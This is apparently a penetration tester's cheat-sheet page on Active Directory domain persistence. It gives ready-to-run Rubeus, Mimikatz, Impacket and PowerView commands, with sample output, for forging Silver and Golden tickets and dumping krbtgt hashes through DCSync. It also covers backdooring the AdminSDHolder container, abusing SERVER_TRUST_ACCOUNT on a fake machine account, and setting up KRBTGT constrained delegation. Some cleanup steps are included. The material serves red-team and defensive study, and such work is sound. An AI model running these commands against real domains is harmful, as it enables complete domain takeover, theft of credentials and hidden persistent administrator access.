Dominance

Silver Ticket

Rubeus
Impacket
Cmd > Rubeus.exe s4u /domain:megacorp.local /dc:dc1.megacorp.local /user:SRV01$ /rc4:fc525c9683e8fe067095ba2ddc971889 /altservice:http/srv01.megacorp.local /impersonateuser:Administrator /self /ptt
$ getST.py megacorp.local/'SRV01#x27; -hashes :fc525c9683e8fe067095ba2ddc971889 -dc-ip 192.168.1.11 -spn ldap/srv01.megacorp.local -impersonate 'Administrator'

Golden Ticket

Mimikatz
Impacket
Cmd > .\mimikatz.exe "kerberos::golden /domain:megacorp.local /user:snovvcrash /sid:<SID> /krbtgt:<NTHASH> /ptt [/startoffset:-10 /endin:60 /renewmax:10080]" "exit"
Cmd > .\mimikatz.exe "lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local" "exit"
$ ticketer.py -nthash 00ff00ff00ff00ff00ff00ff00ff00ff -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain megacorp.local snovvcrash
$ export KRB5CCNAME=`readlink -f snovvcrash.ccache`
$ psexec.py megacorp.local/[email protected] -k -no-pass
$ secretsdump.py megacorp.local/[email protected] -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Diamond Ticket

AdminSDHolder Modification

Create a Backdoor

Add a new domain user or grant an existent user GenericAll permissions for the AdminSDHolder container:
PV3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose
Check that granting AdminSDHolder permissions was successful (may take 60+ minutes for the security ACLs to get updated for that user):
PV3 > Get-DomainUser snovvcrash | select objectsid
S-1-5-21-2284550090-1208917427-1204316795-9824
PV3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID :
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the AdminCount attribute will stay 1 anyways after adding the backdoor user to a protected group for the first time):
PV3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"}
AceType : AccessAllowed
ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
PV3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash
PV3 > Get-DomainUser snovvcrash | select admincount
admincount
----------
1

Remove the Backdoor

Disable or remove the account (if a new user was created):
PS > net user snovvcrash /domain /active:no
PS > net user snovvcrash /domain /del
Remove user AdminSDHolder container via GUI (ADUC, dsa.msc).
Clear the AdminCount attribute (will be resetted if the user is still in the AdminSDHolder container):
PV3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose
Or
PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount
Fix the inheritance rules:
PS > [bool]$isProtected = $false
PS > [bool]$PreserveInheritance = $true
PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName
PS > $user = [ADSI]"LDAP://$dn"
PS > $acl = $user.objectSecurity
PS > $acl.AreAccessRulesProtected
True # procced if True
PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance)
PS > $inherited = $acl.AreAccessRulesProtected
PS > $user.commitchanges()
PS > $acl.AreAccessRulesProtected
False

SERVER_TRUST_ACCOUNT

When DA is owned (or any other account with DS-Install-Replica permission), you can create a fake machine account (or use an existing real machine account), set SERVER_TRUST_ACCOUNT bit for it and perform DCSync on behalf of this account to regain domain dominance.
1. Create a fake machine account:
PM > New-MachineAccount -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Verbose
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 515 WORKSTATION_TRUST_ACCOUNT
2. Set the SERVER_TRUST_ACCOUNT bit:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=8192}
PV3 > Get-DomainComputer FakeMachine | select name,primarygroupid,useraccountcontrol
name primarygroupid useraccountcontrol
---- -------------- ------------------
FakeMachine 516 SERVER_TRUST_ACCOUNT
3. Perform DCSync:
$ secretsdump.py MEGACORP/'FakeMachine$:Passw0rd!'@DC01.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
4. Cleanup:
PV3 > Set-DomainObject FakeMachine -Set @{useraccountcontrol=4096}
Or
PM > Remove-MachineAccount -MachineAccount FakeMachine

KRBTGT Constrained Delegation

Windows
Linux
# create a new service account (or abuse an existing one)
PM > New-MachineAccount -Domain megacorp.local -DomainController DC01.megacorp.local -MachineAccount FakeMachine -Password $(ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force) -Verbose
# set UAC to be 'WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=16781312} -Verbose
# set the krbtgt SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{"msDS-AllowedToDelegateTo"[email protected]("krbtgt/MEGACORP")} -Verbose
# request TGS via S4U (will act as a TGT of the impersonated user)
PS > .\Rubeus.exe s4u /domain:megacorp.net /user:FakeMachine$ /rc4:b2bdbe60565b677dfb133866722317fd /impersonateuser:snovvcrash /msdsspn:krbtgt/MEGACORP /ptt
# cleanup: remove the SPN for delegation
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Clear msDS-AllowedToDelegateTo -Verbose
# cleanup: back to UAC 'WORKSTATION_TRUST_ACCOUNT'
PV3 > Set-DomainObject "CN=FakeMachine,CN=Computers,DC=megacorp,DC=local" -Set @{useraccountcontrol=4096} -Verbose
# create a new service account (or abuse an existing one)
$ addcomputer.py -computer-name Persist1 -computer-pass 'Passw0rd1!' -dc-ip 192.168.1.11 megacorp.local/lowpriv:'Passw0rd2!'
# set UAC to be' WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION' and set the krbtgt SPN for delegation
$ python3 setCD.py megacorp.local/administrator:'Passw0rd3!' -dc-ip 192.168.1.11 -target 'Persist1#x27; -spn krbtgt/MEGACORP
# request TGS via S4U (will act as a TGT of the impersonated user)
$ getST.py -spn krbtgt/MEGACORP megacorp.local/'Persist1$:Passw0rd1!' -dc-ip 192.168.1.11 -impersonate 'DC01#x27;
# fire DCSync
$ KRB5CCNAME=`pwd`/'DC01$.ccache' secretsdump.py DC01.megacorp.local -dc-ip 192.168.1.11 -k -no-pass -just-dc
Last modified 27d ago